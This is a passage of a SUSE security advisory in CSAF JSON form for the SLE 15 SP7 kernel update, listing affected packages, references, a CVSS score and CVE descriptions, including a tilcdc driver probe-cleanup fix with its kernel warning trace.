"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71138",
"url": "https://www.suse.com/security/cve/CVE-2025-71138"
},
{
"category": "external",
"summary": "SUSE Bug 1256785 for CVE-2025-71138",
"url": "https://bugzilla.suse.com/1256785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71141",
"url": "https://www.suse.com/security/cve/CVE-2025-71141"
},
{
"category": "external",
"summary": "SUSE Bug 1256756 for CVE-2025-71141",
"url": "https://bugzilla.suse.com/1256756"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
